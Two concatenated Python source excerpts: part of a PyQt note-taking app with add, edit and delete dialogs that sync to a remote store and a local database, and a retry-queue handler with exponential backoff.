grid.addWidget(self.btnCancel, 2, 2)
self.addNoteDialog.setLayout(grid)
self.btnSave.clicked.connect(self.saveNewNote)
self.btnCancel.clicked.connect(lambda: self.addNoteDialog.close())
self.addNoteDialog.exec_()
def saveNewNote(self):
id= ''
timestamp = datetime.datetime.now()
data = {
"note": str(self.editText.toPlainText()),
"datestamp": str(timestamp),
"hashval": hash(str(timestamp)),
"lastchanged": str(timestamp)
}
try:
id = fb.insertData(data)
except:
msg = QMessageBox()
msg.setWindowTitle("Error!")
msg.setIcon(QMessageBox.Critical)
msg.setText("You are not connected to internet. Please connect for a better experience.")
msg.exec_()
if id == '':
id = uuid.uuid1()
dbop.insertDatSQL(id, str(self.editText.toPlainText()), str(timestamp))
today = datetime.date.today()
self.currentWorkingDate = today
self.fillDataIntoTable()
self.addNoteDialog.close()
msg = QMessageBox()
msg.setWindowTitle("Done!")
msg.setText("New Note Saved.")
msg.exec_()
def clickEditNote(self, e):
index = self.table.selectionModel().currentIndex()
tmpNote = index.sibling(index.row(), 3).data()
# tmpTimeStamp = index.sibling(index.row(), 1).data() + " " + index.sibling(index.row(), 2).data()
tmpId = index.sibling(index.row(), 0).data()
if tmpId is None:
msg = QMessageBox()
msg.setWindowTitle("Error")
msg.setIcon(QMessageBox.Critical)
msg.setText("There are not items in this date for you to edit or you have not yet selected any note. "
"Please select a note you want to edit and try again")
msg.exec_()
return
else:
self.editNoteDialog = QDialog()
self.editNoteDialog.setWindowTitle("Edit Note")
self.editNoteDialog.setWindowIcon(QIcon("./src/icon_notes.png"))
self.editNoteDialog.setFixedSize(500, 300)
self.editText = QTextEdit()
self.btnEditSave = QPushButton("Save")
self.btnCancel = QPushButton("Cancel")
self.editText.setText(tmpNote)
grid = QGridLayout()
grid.addWidget(QLabel("Note"), 0, 0)
grid.addWidget(self.editText, 1, 0, 1, 3)
grid.addWidget(self.btnEditSave, 2, 1)
grid.addWidget(self.btnCancel, 2, 2)
self.editNoteDialog.setLayout(grid)
self.btnEditSave.clicked.connect(lambda : self.saveEditNote(tmpId))
self.btnCancel.clicked.connect(lambda: self.editNoteDialog.close())
self.editNoteDialog.exec_()
def saveEditNote(self, id):
dm = datetime.datetime.now()
try:
fb.editNode(id, self.editText.toPlainText(), hash(str(dm), str(dm)))
except:
msg = QMessageBox()
msg.setWindowTitle("Error!")
msg.setIcon(QMessageBox.Critical)
msg.setText("You are not connected to internet. Please connect for a better experience.")
msg.exec_()
dbop.updateDataAsPerId(id, self.editText.toPlainText(), dm)
self.editNoteDialog.close()
msg = QMessageBox()
msg.setWindowTitle("Done!")
msg.setText("Note has been updated.")
msg.exec_()
self.fillDataIntoTable()
def clickDeleteNote(self, e):
index = self.table.selectionModel().currentIndex()
tmpId = index.sibling(index.row(), 0).data()
print(tmpId)
if tmpId is None or tmpId == '':
msg = QMessageBox()
msg.setWindowTitle("Error")
msg.setIcon(QMessageBox.Critical)
msg.setText("You cannot add new item to older dates.")
msg.exec_()
return
else:
msg = QMessageBox()
msg.setWindowTitle("Delete!")
msg.setIcon(QMessageBox.Information)
msg.setText("Are you sure you want to delete this note?")
msg.addButton(QMessageBox.Yes)
msg.addButton(QMessageBox.No)
res = msg.exec_()
if res == QMessageBox.Yes:
dm = str(datetime.datetime.now())
try:
fb.deleteNote(tmpId, dm)
except:
msg = QMessageBox()
msg.setWindowTitle("Error")
msg.setIcon(QMessageBox.Critical)
msg.setText("You are not connected to the internet. Please connect to internet for a better experience.")
msg.exec_()
dbop.deleteNoteById(tmpId, dm)
msg = QMessageBox()
msg.setWindowTitle("Done!")
msg.setText("Note has been deleted.")
msg.exec_()
self.fillDataIntoTable()
def close(self):
self.thread_stop_flag = False
|
retryhandler.py
|
import sys, time, threading, os, traceback, logging
from queue import Queue
class RetryHandler:
def __init__(self, evaluator, maxTries = 10, waitTimeSeconds = 2, expBackoff = True, maxQueued = 0):
self._evaluator = evaluator
self._maxTries = maxTries
self._waitTime = waitTimeSeconds
self._expBackoff = expBackoff
self._queue = Queue(maxQueued)
self._tries = 0
self._failedRequest = None
self._shouldJoin = False
self._workerThread = None
def startWorker(self):
def worker():
logging.debug("Started queue-worker")
while not (self._shouldJoin and self._queue.empty()):
self._processQueue()
self._workerThread = threading.Thread(name="queue-worker", target=worker)
self._workerThread.start()
def joinWorker(self):
self._shouldJoin = True
self._workerThread.join()
def enqueue(self, r):
self._queue.put(r)
def _processQueue(self):
request = None
if not self._failedRequest == None:
logging.info('Retrying failed request')
request = self._failedRequest
else:
try:
request = self._queue.get(timeout=2)
logging.debug('Processing queued request (' + str(self._queue.qsize()) + ' remaining)')
except:
return
try:
self._evaluator.eval(request)
logging.debug('Successfully handled request')
self._tries = 0
self._failedRequest = None
except Exception:
logging.exception("Exception when evaluating request")
self._tries += 1
self.checkMaxTries()
self._failedRequest = request
waitTime = self._comupteWaitTime()
logging.warn(self._triesStr() + ' Retry in: ' + str(waitTime) + ' seconds')
time.sleep(waitTime)
def checkMaxTries(self):
if self._tries >= self._maxTries:
logging.error('Exceeded the maximum amount of retries! Shutting down.')
os._exit(-1)
def _triesStr(self):
return '(' + str(self._tries) + '/' +str(self._maxTries) + ')'
def _comupteWaitTime(self):
if self._expBackoff:
return self._waitTime*(2**(self._tries-1))
else:
return self._waitTime
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.